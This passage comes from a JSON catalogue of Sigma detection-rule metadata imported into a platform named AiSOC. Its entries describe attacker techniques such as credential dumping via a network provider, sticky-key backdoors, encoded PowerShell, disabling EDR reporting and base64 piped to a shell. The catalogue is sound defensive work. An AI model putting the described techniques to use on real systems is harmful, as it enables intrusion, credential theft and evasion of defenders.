"source": "SigmaHQ/sigma", "source_id": "b9d9b652-d8ed-4697-89a2-a1186ee680ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml" } }, { "id": "sigmahq-sigma-b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "type": "detection", "name": "Suspicious PowerShell Encoded Command Patterns", "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-encoded-command-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml" } }, { "id": "sigmahq-sigma-b9e1f193-d236-4451-aaae-2f3d2102120d", "type": "detection", "name": "Cisco Sniffing", "description": "Show when a monitor or a span/rspan is setup or modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-sniffing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9e1f193-d236-4451-aaae-2f3d2102120d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_net_sniff.yml" } }, { "id": "sigmahq-sigma-b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b", "type": "detection", "name": "Windows Defender Context Menu Removed", "description": "Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.\nThis action removes the \"Scan with Microsoft Defender\" option from the right-click menu for files, directories, and drives.\nAttackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-context-menu-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defender_remove_context_menu.yml" } }, { "id": "sigmahq-sigma-b9f0e6f5-09b4-4358-bae4-08408705bd5c", "type": "detection", "name": "New User Created Via Net.EXE With Never Expire Option", "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-user-created-via-net-exe-with-never-expire-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" } }, { "id": "sigmahq-sigma-ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "type": "detection", "name": "Potential Network Sniffing Activity Using Network Tools", "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-network-sniffing-activity-using-network-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml" } }, { "id": "sigmahq-sigma-ba226dcf-d390-4642-b9af-b534872f1156", "type": "detection", "name": "Windows Event Log Access Tampering Via Registry", "description": "Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-event-log-access-tampering-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba226dcf-d390-4642-b9af-b534872f1156", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml" } }, { "id": "sigmahq-sigma-ba3874b9-0fae-465f-836c-eb5d071a1789", "type": "detection", "name": "NodeJS Execution of JavaScript File", "description": "Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\nNode.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\nAdversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\nBecause Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nodejs-execution-of-javascript-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba3874b9-0fae-465f-836c-eb5d071a1789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_security_susp_node_js_execution.yml" } }, { "id": "sigmahq-sigma-ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "type": "detection", "name": "Potential WinAPI Calls Via CommandLine", "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-winapi-calls-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml" } }, { "id": "sigmahq-sigma-ba42babc-0666-4393-a4f7-ceaf5a69191e", "type": "detection", "name": "Uncommon Child Processes Of SndVol.exe", "description": "Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-processes-of-sndvol-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba42babc-0666-4393-a4f7-ceaf5a69191e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "type": "detection", "name": "Potentially Suspicious DLL Registered Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension. Which is often used as a method to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-dll-registered-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" } }, { "id": "sigmahq-sigma-ba592c6d-6888-43c3-b8c6-689b8fe47337", "type": "detection", "name": "Linux Base64 Encoded Pipe to Shell", "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-base64-encoded-pipe-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" } }, { "id": "sigmahq-sigma-bab049ca-7471-4828-9024-38279a4c04da", "type": "detection", "name": "Virtualbox Driver Installation or Starting of VMs", "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1564.006", "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/virtualbox-driver-installation-or-starting-of-vms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bab049ca-7471-4828-9024-38279a4c04da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml" } }, { "id": "sigmahq-sigma-bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "type": "detection", "name": "Potential Password Spraying Attempt Using Dsacls.EXE", "description": "Detects possible password spraying attempts using Dsacls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-password-spraying-attempt-using-dsacls-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" } }, { "id": "sigmahq-sigma-baca5663-583c-45f9-b5dc-ea96a22ce542", "type": "detection", "name": "Sticky Key Like Backdoor Usage - Registry", "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sticky-key-like-backdoor-usage-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" } }, { "id": "sigmahq-sigma-bacf58c6-e199-4040-a94f-95dea0f1e45a", "type": "detection", "name": "Windows Filtering Platform Blocked Connection From EDR Agent Binary", "description": "Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\nAdversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-filtering-platform-blocked-connection-from-edr-agent-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bacf58c6-e199-4040-a94f-95dea0f1e45a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml" } }, { "id": "sigmahq-sigma-bae2865c-5565-470d-b505-9496c87d0c30", "type": "detection", "name": "SMB Spoolss Name Piped Usage", "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smb-spoolss-name-piped-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bae2865c-5565-470d-b505-9496c87d0c30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" } }, { "id": "sigmahq-sigma-baecf8fb-edbf-429f-9ade-31fc3f22b970", "type": "detection", "name": "Office Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry. Adversaries may modify these keys to execute malicious code when Office files are opened.\nThere are various legitimate add-ins that also use these keys and this filter list might not be exhaustive.\nThus, it is recommended to review and tune filters for your environment to reduce false positives before deploying to production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" } }, { "id": "sigmahq-sigma-baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "type": "detection", "name": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-using-new-networkprovider-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" } }, { "id": "sigmahq-sigma-bafac3d6-7de9-4dd9-8874-4a1194b493ed", "type": "detection", "name": "Abusing Print Executable", "description": "Attackers can use print.exe for remote file copy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abusing-print-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml" } }, { "id": "sigmahq-sigma-bb09dd3e-2b78-4819-8e35-a7c1b874e449", "type": "detection", "name": "HackTool - Inveigh Execution Artefacts", "description": "Detects the presence and execution of Inveigh via dropped artefacts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-inveigh-execution-artefacts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" } }, { "id": "sigmahq-sigma-bb0e87ce-c89f-4857-84fa-095e4483e9cb", "type": "detection", "name": "Suspicious Child Process of Notepad++ Updater - GUP.Exe", "description": "Detects suspicious child process creation by the Notepad++ updater process (gup.exe).\nThis could indicate potential exploitation of the updater component to deliver unwanted malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-notepad-updater-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb0e87ce-c89f-4857-84fa-095e4483e9cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_susp_child_process.yml" } }, { "id": "sigmahq-sigma-bb0e9cec-d4da-46f5-997f-22efc59f3dca", "type": "detection", "name": "Potential JNDI Injection Exploitation In JVM Based Application", "description": "Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-jndi-injection-exploitation-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb0e9cec-d4da-46f5-997f-22efc59f3dca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_jndi_injection_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "type": "detection", "name": "PowerShell Core DLL Loaded Via Office Application", "description": "Detects PowerShell core DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-core-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_powershell_dll_load.yml" } }, { "id": "sigmahq-sigma-bb382fd5-b454-47ea-a264-1828e4c766d6", "type": "detection", "name": "Shell Invocation via Apt - Linux", "description": "Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-apt-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb382fd5-b454-47ea-a264-1828e4c766d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml" } }, { "id": "sigmahq-sigma-bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "type": "detection", "name": "Suspicious Desktopimgdownldr Command", "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-desktopimgdownldr-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml" } }, { "id": "sigmahq-sigma-bb76d96b-821c-47cf-944b-7ce377864492", "type": "detection", "name": "Suspicious NTLM Authentication on the Printer Spooler Service", "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ntlm-authentication-on-the-printer-spooler-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb76d96b-821c-47cf-944b-7ce377864492", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml" } }, { "id": "sigmahq-sigma-bb780e0c-16cf-4383-8383-1e5471db6cf9", "type": "detection", "name": "Suspicious XOR Encoded PowerShell Command", "description": "Detects presence of a potentially xor encoded powershell command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1140", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-xor-encoded-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" } }, { "id": "sigmahq-sigma-bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "type": "detection", "name": "Suspicious File Created In PerfLogs", "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-in-perflogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml" } }, { "id": "sigmahq-sigma-bbb80e91-5746-4fbe-8898-122e2cafdbf4", "type": "detection", "name": "Suspicious PowerShell Invocations - Generic - PowerShell Module", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-generic-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" } }, { "id": "sigmahq-sigma-bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "type": "detection", "name": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ 